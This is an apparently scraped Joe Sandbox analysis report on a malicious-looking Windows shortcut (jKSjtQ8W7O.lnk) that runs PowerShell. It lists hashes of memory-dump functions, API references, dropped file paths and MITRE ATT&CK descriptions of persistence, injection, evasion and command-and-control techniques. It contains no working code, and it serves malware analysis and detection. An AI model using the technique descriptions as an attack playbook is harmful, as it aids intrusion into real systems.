Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d3cbcb5d922999b7ddb36f0f216c45cebe42487a76f1bc84a47cb934380b1aa9
Instruction ID: e074fbd1f419ab793976fa3ab9084c9366a1d1984918191769ba2930ea88e5d6
Opcode Fuzzy Hash: d3cbcb5d922999b7ddb36f0f216c45cebe42487a76f1bc84a47cb934380b1aa9
Instruction Fuzzy Hash: EF31917191CA1C9FDB58EF58D846AF977E0FB69321F10422EE04EE3251CB70A8128BC1

Function 00007FFB4ADD45EA Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 00007FFB4AE1FCD5

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3dd75d4df9f798202310af213f101ee6d389867b3c37768b88645c7e8b611511
Instruction ID: 83b863c18a0d143a0bec99ca946176086577062ac59b7af335436b4b22c97bd3
Opcode Fuzzy Hash: 3dd75d4df9f798202310af213f101ee6d389867b3c37768b88645c7e8b611511
Instruction Fuzzy Hash: A021A170A0CA0C9FDB58EFA8C445BF9BBE4FB55321F10412ED04AD3651DB70A816CB90

Function 00007FFB4AEA15DD Relevance: .6, Instructions: 565
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d93a044c44357399f811e164dee71259c96caa2d4551c5dcd4b5a10092e921
Instruction ID: e9803ada1f6c1dfc367fe10d11e088c21460d252d2fd19142f7452b37e2acb9e
Opcode Fuzzy Hash: e3d93a044c44357399f811e164dee71259c96caa2d4551c5dcd4b5a10092e921
Instruction Fuzzy Hash: EB02F4A194EBC58FD397AF38A9151B47FE5EF83210B2901FBD098CB093D9199C06C392

Function 00007FFB4AEA2C71 Relevance: .4, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41555e43ffdaa634eecd3f9ffda4351d6080b86b937fd434b3380ec1fc74509b
Instruction ID: e48de3ece371328c77bc8dc04c7b12ed24e44da688dc1f91caa5de616c185703
Opcode Fuzzy Hash: 41555e43ffdaa634eecd3f9ffda4351d6080b86b937fd434b3380ec1fc74509b
Instruction Fuzzy Hash: 61B13BA2A4DB8A8FE396BE3888151B47BD5EF46320B2801FBD45DDB1E3DD189C468351

Function 00007FFB4AEA52B6 Relevance: .2, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f2d0bd7f7944c27f1df87ed32088de0929190dd21b6e944fc184cec2d1f27c
Instruction ID: 85c5e1c0213d4641f8d677e8a2166695ef9fd523ce7c6287c9ef5b3f34cd85a5
Opcode Fuzzy Hash: 67f2d0bd7f7944c27f1df87ed32088de0929190dd21b6e944fc184cec2d1f27c
Instruction Fuzzy Hash: 8F5170A188E7C59FE3536B7488654A57FE8EF5722072900EBD4D9CB0A3D94C1C0AC372

Function 00007FFB4AEA2CE0 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98bd45ccd00079291947c19a00a6cde2fca6a7368bf913b20ef540bc538b5316
Instruction ID: ad463c60b7f81fd51e9b1d3b82e0d9c5419133a1f8a5bd73878053ae75d9b9f0
Opcode Fuzzy Hash: 98bd45ccd00079291947c19a00a6cde2fca6a7368bf913b20ef540bc538b5316
Instruction Fuzzy Hash: F23137A2B4EF8B8BE3AABE3C895127965C9FF44320B7401F9D46DE70E3DD0898004241

Function 00007FFB4AEA32EA Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f122451df860508560712c9b7ae7efb73a0449a06e7979267664dabed64a767
Instruction ID: 2b1fc586ba4ad193d53237e516d4f9c66293fe83823d2e5f0340612ff5dee2e9
Opcode Fuzzy Hash: 5f122451df860508560712c9b7ae7efb73a0449a06e7979267664dabed64a767
Instruction Fuzzy Hash: 7A21F776B0CA1A8FEBA5BD6CE4065F8B3D1FB94210B3842F7C469C3182DD09AC154380

Function 00007FFB4AEA17FD Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9632633544207a03bf66228bd3f3efa9132d720497aaec3b6aae6f863c3c494d
Instruction ID: bbd47f5e2270dd9e2ec73224671c7a404b5523ce4c2d95e459676fcb902a408b
Opcode Fuzzy Hash: 9632633544207a03bf66228bd3f3efa9132d720497aaec3b6aae6f863c3c494d
Instruction Fuzzy Hash: 462106A3E5FB854BE3A57E7CB9121B4A5C5FF8171077901FAD4ACC3183EC29AC064186

Non-executed Functions

Function 00007FFB4ADDEDE0 Relevance: 7.2, Strings: 4, Instructions: 2203COMMON

Download Yara Rule

Strings

xI_L, xrefs: 00007FFB4AE0ACEF
yI_L, xrefs: 00007FFB4AE0AB72
uT_I, xrefs: 00007FFB4AE0AED3
~T_I, xrefs: 00007FFB4AE0A5D4

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID: uT_I$xI_L$yI_L$~T_I
API String ID: 0-1747203710
Opcode ID: e2a488a603da00c34d8cf8791765ba249ca855343ee9cd3678d44ade1d0530ce
Instruction ID: 76d564657e3fcf444ade445e75bf5a6b7bc6388da93d9f71aef7a6a23107664d
Opcode Fuzzy Hash: e2a488a603da00c34d8cf8791765ba249ca855343ee9cd3678d44ade1d0530ce
Instruction Fuzzy Hash: 89E2F0B1A1CA1A8FE7A8FE2CC555A7477D5FF64300BB401F9C06ED7192DD28AC429781

Function 00007FFB4ADEDD80 Relevance: 2.1, Strings: 1, Instructions: 844COMMON

Download Yara Rule

Strings

\K_H, xrefs: 00007FFB4ADEDFBF

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID: \K_H
API String ID: 0-2574550302
Opcode ID: 6d1d88be4669bdcbf5f21dc241620772b33dd7840682d1c212765126789b2398
Instruction ID: 9c0119f9f4aa61fbb89b44f0061d876bcb560874c9df3274ff1b7df4a54af053
Opcode Fuzzy Hash: 6d1d88be4669bdcbf5f21dc241620772b33dd7840682d1c212765126789b2398
Instruction Fuzzy Hash: EE428071B1CE499FEB94EF2CD845AAA77E1FF98350F1401B9E44EC3296DE24E8418781

Function 00007FFB4ADFC510 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf7b02c92bf14272ae8a814e251e75fe6af8ecb9a25468571c0842171dd3f480
Instruction ID: cb61122d8fcfcde237e7962338a41e58e61ab67736bf9dc17d68fd9e88b97b9f
Opcode Fuzzy Hash: bf7b02c92bf14272ae8a814e251e75fe6af8ecb9a25468571c0842171dd3f480
Instruction Fuzzy Hash: 81D128B7B0C6564BE355BE3CE4511EA3B94EF84335B1401BBE48ECB193DE14B84786A0

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jKSjtQ8W7O.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0glsiur.w5e.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojqp4zdh.ydb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttrrrczt.yxr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkqd1a1j.3am.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0WU5RS7E2LEYX4UPRJNW.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7cd4e7a7671bd03a.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Windows Analysis Report
jKSjtQ8W7O.lnk

Function 00007FFB4ADD6E00 Relevance: 10.9, Strings: 8, Instructions: 872
COMMON

Function 00007FFB4ADDC93B Relevance: 8.0, Strings: 6, Instructions: 473
COMMON